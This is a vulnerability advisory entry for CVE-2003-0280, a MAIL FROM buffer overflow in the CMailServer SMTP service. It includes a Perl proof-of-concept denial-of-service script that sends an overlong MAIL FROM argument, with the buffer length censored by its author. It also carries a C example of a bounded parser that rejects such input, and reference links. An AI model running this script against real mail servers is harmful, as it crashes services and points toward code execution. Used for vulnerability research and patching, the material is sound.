Youngzsoft CMailServer MAIL FROM Remote Buffer Overflow Vulnerability

Vulnerability ID 1107314 Vulnerability type Boundary condition error
Published 2003-05-10 Updated 2005-10-20
CVE ID CVE-2003-0280
CNNVD ID CNNVD-200306-102
Platform Windows CVSS score 10.0
|Sources
https://www.exploit-db.com/exploits/22581
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-102
|Details
CMailServer is an e-mail server that also includes a web-based mail system. Its SMTP service performs no proper bounds check on the "MAIL FROM" field of a message, so a remote attacker can use this to overflow a buffer in the service and possibly execute arbitrary instructions on the system. The problem lies in how the SMTP service parses e-mail header fields: an overlong "MAIL FROM" field in a message built by an attacker corrupts memory and triggers a buffer overflow, and carefully constructed data may lead to arbitrary code execution on the system.
|Exploit
source: http://www.securityfocus.com/bid/7547/info

A buffer overflow vulnerability has been reported for CMailServer. The vulnerability exists due to insufficient bounds checking when parsing e-mail headers. Specifically, an overly long MAIL FROM e-mail header will cause CMailServer to crash and corrupt sensitive memory. 

#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: [email protected]
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
# stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Ive censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;

my $target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; # overlong MAIL FROM argument; length censored by the author
my $resp;

# Plain TCP connection to the SMTP port
my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

# Expect a 2xx greeting banner
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

# The "@" is escaped so Perl does not interpolate it as an array
print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
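As an added illustration (not code from this page, the advisory, or CMailServer itself), a bounded parser for the MAIL FROM argument in C, showing the length check whose absence the advisory describes. The RFC 5321 limits, the buffer sizes, the return codes and the example.com inputs are assumptions; the verb match is case-sensitive for brevity, where a real server would match ignoring case.

```c
#include <string.h>

/* Assumed limits from RFC 5321 section 4.5.3.1 (not CMailServer's own):
 * a reverse-path is at most 256 octets, a command line at most 512. */
#define MAX_PATH_LEN 256
#define MAX_LINE_LEN 512

typedef struct { char reverse_path[MAX_PATH_LEN + 1]; } mail_from_t;

/* Parse "MAIL FROM:<path>" into out. Returns 0 on success, negative on
 * rejection. The argument length is compared with the destination before
 * any copy (the check the advisory says the server lacked), so an
 * overlong MAIL FROM is refused instead of overrunning the buffer. */
int parse_mail_from(const char *line, mail_from_t *out)
{
    const char *p, *end;
    size_t len;
    if (line == NULL || out == NULL) return -1;
    /* Bounded scan: no NUL within 513 bytes means the line is too long. */
    if (memchr(line, '\0', MAX_LINE_LEN + 1) == NULL) return -2;
    if (strncmp(line, "MAIL FROM:", 10) != 0) return -3;
    for (p = line + 10; *p == ' '; p++) ;
    if (*p != '<' || (end = strchr(++p, '>')) == NULL) return -4;
    len = (size_t)(end - p);
    if (len > MAX_PATH_LEN) return -5;      /* refuse, do not truncate or overflow */
    memcpy(out->reverse_path, p, len);
    out->reverse_path[len] = '\0';
    return 0;
}

/* 1 when line is accepted and its reverse-path equals expected, else 0. */
int parsed_path_matches(const char *line, const char *expected)
{
    mail_from_t m;
    return parse_mail_from(line, &m) == 0 && strcmp(m.reverse_path, expected) == 0;
}

/* Constructed input mirroring the PoC's "A" x N payload: build
 * "MAIL FROM:<AAA...A@example.com>\r\n" with n 'A's, return the verdict. */
int verdict_for_padding(size_t n)
{
    static char line[4096];
    const char *tail = "@example.com>\r\n";
    mail_from_t m;
    if (n + 11 + strlen(tail) + 1 > sizeof line) return -99;
    memcpy(line, "MAIL FROM:<", 11);
    memset(line + 11, 'A', n);
    memcpy(line + 11 + n, tail, strlen(tail) + 1);
    return parse_mail_from(line, &m);
}
```

A padding of 300 bytes is rejected by the path limit, while a padding of 1000 bytes is already rejected by the line-length scan before the argument is even examined.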
|References

Source: BUGTRAQ
Name: 20030510 Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105258772101349&w=2
Source: XF
Name: cmailserver-smtp-bo(11975)
Link: http://xforce.iss.net/xforce/xfdb/11975
Source: BID
Name: 7548
Link: http://www.securityfocus.com/bid/7548
Source: BID
Name: 7547
Link: http://www.securityfocus.com/bid/7547
Source: VULNWATCH
Name: 20030510 Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0
Link: http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0062.html
